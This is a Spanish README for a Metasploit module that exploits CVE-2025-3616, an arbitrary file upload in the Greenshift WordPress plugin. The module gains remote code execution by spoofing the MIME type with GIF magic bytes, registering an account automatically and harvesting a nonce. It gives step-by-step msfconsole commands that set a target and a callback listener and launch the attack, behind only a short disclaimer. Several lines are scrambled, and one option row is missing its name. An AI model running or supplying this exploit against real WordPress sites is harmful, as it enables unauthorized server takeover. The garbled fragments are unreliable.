
Metasploit module que explota la carga arbitraria de archivos en el plugin Greenshift de WordPress (CVE-2025-3616) para lograr RCE mediante suplantación de MIME, con auto-registro y extracción de nonce.
Este repositorio contiene un módulo de Metasploit para explotar la CVE-2025-3616, una vulnerabilidad de subida de archivos arbitraria en el plugin Greenshift de WordPress (versiones 11.4 a 11.4.5).
El exploit permite a usuarios autenticados (Suscriptor+) subir archivos arbitrarios, lo que conduce a la ejecución remota de código (RCE). Omite la validación del tipo de archivo del plugin falsificando el tipo MIME mediante los bytes mágicos GIF (GIF89a;).
USERNAME/PASSWORD).REGISTER para registrar automáticamente un nuevo usuario y explotar la vulnerabilidad usando las cookies de sesión recién obtenidas (útil si el registro está habilitado en el objetivo).wp_rest requerido del panel de administración.finfo_file().Asegúrate de tener instalado Metasploit Framework.
Copia wp_greenshift_file_upload.rb a tu directorio local de módulos:
mkdir -p ~/.msf4/modules/exploits/unix/webapp/
cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
Inicia msfconsole y recarga los módulos:
msfconsole
msf6 > reload_all
Si el registro de usuarios está habilitado en el objetivo, no necesitas credenciales.
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
Si ya tienes un usuario válido (Suscriptor o superior):
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
| Opción | Requerido | Descripción |
|---|---|---|
| RHOSTS | Sí | La dirección del objetivo |
| LHOST | Sí | La dirección de escucha (tu IP) |
| REGISTER | No | Establécelo en true para registrar una nueva cuenta automáticamente (Por defecto: false) |
| USERNAME | No | Nombre de usuario de WordPress (requerido si REGISTER es false) |
| PASSWORD | No | Contraseña de WordPress (requerida si REGISTER es false) |
| No | Correo electrónico para el registro (opcional, se genera automáticamente si está vacío) |
Este módulo es solo para fines educativos y pruebas de penetración autorizadas. El uso de este código para atacar objetivos sin consentimiento mutuo previo es ilegal.